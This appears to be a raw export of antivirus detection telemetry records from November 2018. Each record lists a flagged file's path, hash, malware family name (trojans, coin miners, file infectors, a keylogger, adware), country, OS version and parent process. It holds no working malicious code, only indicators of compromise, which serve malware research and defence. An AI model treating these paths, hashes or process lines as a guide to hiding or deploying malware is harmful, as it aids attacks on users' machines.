  Row(detection=Row(filename='avscan-20181101-154730-6bd830d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154730-6BD830D1', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:47:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154528-fd4a82d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a955cb2e\\AVSCAN-20181101-153244-A478C5C4\\AVSCAN-20181101-154528-FD4A82D2', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T20:45:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T17:22:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='860959cf41322f3fb28ce604a8afd266988f8e6183ee16e5db106714dc044943', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='daa81984f32ced6945875929c051cb5e68c69abc8b9980c93c7382a7acf787fc', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-16\\DAA81984F32CED6945875929C051CB5E68C69ABC8B9980C93C7382A7ACF787FC', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='daa81984f32ced6945875929c051cb5e68c69abc8b9980c93c7382a7acf787fc', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-16.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-17.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-18.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-19.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-20.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\archive.zip\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T05:48:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='recorded tv.exe', filepath='C:\\Users\\X\\Recorded TV\\Recorded TV.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T07:36:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210808-c34abafd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c35755c0\\AVSCAN-20181101-205617-602DFCFE\\AVSCAN-20181101-210808-C34ABAFD', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='cd2a73795bcd963999c929a1ad3f17695eb7e5773effdc96473fca2dc8cc20de', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:38:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='p3core.dll', filepath='C:\\Program Files (x86)\\HP Games\\Big Rig Europe\\p3core.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='775d56f4852f83d896da3ae2bf8009f8f796bb65ba318dad946bf9af995c1a08', metadata=Row(cmdline='--engine=2 --session-id=5Ya6JSsEXoDpsMfbE4n3gocCgRj8vB0GshXDy+BN --registry-suffix=ESET', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\27.148.201\\software_reporter_tool.exe', parentsize=12623992, timestamp='2018-11-01T08:00:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160514-0377784b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-160316-EA08796C\\AVSCAN-20181101-160514-0377784B', filesize=1024000, name='ADWARE/Kuaiba.1024000.1.#M1.#R1'), hash='73f81ea320a6058eb56347b49cd9fad1d0042feee31dec4a39a9b987bd131fec', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:05:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sdclt.exe', filepath='H:\\SDCLT.EXE', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='66c799f4772ee3a7ff59b13e76bd32994490b66034d5798a5d627b450a77212e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Baidu Security\\Baidu Antivirus\\5.4.3.124234.0\\BAVSvc.exe', parentsize=2572928, timestamp='2018-11-01T10:01:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190327-dfee1849', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190124-CAF68D09\\AVSCAN-20181101-190327-DFEE1849', filesize=64000, name='BDS/Rogue.766012.#M1.#R1'), hash='d809a1cf78a0751b6980abcbb83f400d51e369658aefe4ec3acc97bf43fd79af', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:03:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-163211-acd2e9cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_17c53a39\\AVSCAN-20181101-163139-A6E8024E\\AVSCAN-20181101-163211-ACD2E9CB', filesize=512000, name='TR/Chydo.TF.#M1.#R1'), hash='e3460c24a1aa8b9a9694490074b672fd95f10e62f5467b2503cfb7fcd43e73da', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:32:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2b0137ffe77c6ef3d1b8f5390e0e262bbb9f9ad1', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\2b0137ffe77c6ef3d1b8f5390e0e262bbb9f9ad1', filesize=584000, name='TR/Dropper.VB.d50e31.#M1.#R1'), hash='d50e31534edead41ed9449f6c89feddb29fc729ec79f8275d84501190efc0859', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:25:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cdbxp_setup_4.5.4.5000.exe', filepath='e:\\data\\downloads\\cd-burnerxp\\cdbxp_setup_4.5.4.5000.exe', filesize=5644000, name='PUA/OpenCandy.#M1.#R1'), hash='e7c7de9c5a78e67740cc849fcd9d2cc760be1688ffb045d6dd38a0eb286defae', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T12:28:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-012105-1ac1595c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ee50773\\AVSCAN-20181101-011928-0E61CA2D\\AVSCAN-20181101-012105-1AC1595C', filesize=4800000, name='TR/Spy.Banker.Gen.#M1.#R1'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:22:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T13:09:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124051-53cdee6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124030-41F23286\\AVSCAN-20181101-124051-53CDEE6A', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:40:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-121607-6184f421', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-121507-2E12CBCC\\AVSCAN-20181101-121607-6184F421', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:16:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111908-386cb262', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111908-386CB262', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:18:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tzpefjw.vgv', filepath='C:\\Windows\\System32\\tzpefjw.vgv', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline='tzpefjw.vgv,befiwa', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T16:59:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111145-00848ceb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111145-00848CEB', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:11:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='563912c9c63acb40616406e0835bb88dc4aa4ec9c04a8054eac90d9f4a516d54.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-19.available\\Avira\\563912C9C63ACB40616406E0835BB88DC4AA4EC9C04A8054EAC90D9F4A516D54.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='563912c9c63acb40616406e0835bb88dc4aa4ec9c04a8054eac90d9f4a516d54', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:47:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='prst.dll', filepath='F:\\Users\\X\\AppData\\Local\\Temp\\sega\\Prst.dll', filesize=128000, name='TR/SPY.KeyLogger.zakea.#M1.#R1'), hash='a5ed6f4644f888a56ed7c57c53fbb6f1f7a49454db4c09a58fc6617a29b7cb1f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:52:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[10].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[10].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:24:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='windowsformsapplication3.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsFormsApplication3.exe', filesize=64000, name='TR/Dropper.Gen.#M300.#R3643'), hash='6a4c8cbc73292ea252ba6e1045c1cc15476ad137fbbd0ee99de25bc8cb7a3ce8', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:42:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msinfo32.exe', filepath='C:\\Windows\\winsxs\\x86_microsoft-windows-msinfo32-exe_31bf3856ad364e35_6.1.7601.17514_none_ade3d0c257f06243\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='3118e7127955afc360a5207455eec2926ff869a8e0326ee19b7b9506a85b3122', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3811144, timestamp='2018-11-01T11:34:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215307-1631a3d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_18447551\\AVSCAN-20181101-215244-13F27C69\\AVSCAN-20181101-215307-1631A3D4', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T20:53:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-022216-459989e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dbe45999\\AVSCAN-20181102-022207-43BF95E6\\AVSCAN-20181102-022216-459989E9', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='25fcb6be8f258d6c6b8fec86c10867cefcdd948001412e6e97c333b025a9ab5b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:22:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-114310-50a16b77', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cc180c4\\AVSCAN-20181101-114254-4DCA7F95\\AVSCAN-20181101-114310-50A16B77', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:43:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0113331.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0113331.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:33:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0127182.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0127182.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:45:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tqipumsmu20xl0l.exe', filepath='\\\\?\\C:\\Program Files (x86)\\ygn1ku2lzbx\\TQIPUMSMU20XL0L.exe', filesize=192000, name='TR/Dropper.Gen.#M300.#R4133'), hash='7e9a1e14fc752e1248e08fe96dfdcab7cd3fc9f568b000813f0c527348a86140', metadata=Row(cmdline=None, country='KE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:06:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T04:05:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T18:55:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d3dx9.dll', filepath='C:\\Users\\X\\Documents\\Minecraft\\Mods & Clients\\Forge\\Vape\\Reviouzs Godly Client\\1.7.10\\d3dx9.dll', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe52_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe52 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-01T14:31:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213922-8fff9ece', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3bb0366c\\AVSCAN-20181101-213427-6896695C\\AVSCAN-20181101-213922-8FFF9ECE', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='1db53c54ad20a118b65f358848fc7ff3e91db289032d210e7bff3d72f24c178a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:39:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='805688a4e627e3c75632011aa36385f7ca259b3dd6ab2cf281f9df6419f22e89', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-17\\805688A4E627E3C75632011AA36385F7CA259B3DD6AB2CF281F9DF6419F22E89', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='805688a4e627e3c75632011aa36385f7ca259b3dd6ab2cf281f9df6419f22e89', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:11:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='0d869b33287050121c11cb0c584808259a6feca84e040ae58a653b3c3e9b01da', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T17:43:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='5b44befadb33a3765f669317aa01a8d4318b34e53337623ab5c33b44904d3504', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-162706-27c6ba81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-162701-272A39FF\\AVSCAN-20181101-162706-27C6BA81', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='77bb75019b5c48cf67751b0df8e81d2fce5c43a882d368ec6e5397a6ac2ef079', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:27:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002018-f24ae79e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-235245-023F16A9\\AVSCAN-20181102-002018-F24AE79E', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:20:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T21:14:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00004254', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp00004254', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T15:38:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190951-95ff5794', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13ee5547\\AVSCAN-20181101-190938-94459C59\\AVSCAN-20181101-190951-95FF5794', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:09:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-131816-6d2e5d9e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b18897e6\\AVSCAN-20181101-131504-56DDCCF3\\AVSCAN-20181101-131816-6D2E5D9E', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:18:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='help.pif', filepath='F:\\New folder\\[IBRASoftware.com] CorelDrawX8 (x64)\\Lang\\br\\Help\\Help.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:16:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='#new hack ghost wolf v1.0.3[vip].vir', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.564\\#New Hack Ghost Wolf V1.0.3[VIP].VIR', filesize=2048000, name='TR/RedCap.gblsf.#M1.#R1'), hash='850d55400b4b6ec3ddcf70a5fae5cbff91c81b8dcf9fff2bc47717cf99dbba48', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T16:40:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160654-3df9a6c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-160645-3CD94395\\AVSCAN-20181101-160654-3DF9A6C5', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:06:50Z'), dt=datetime.date(2018, 11, 1)),
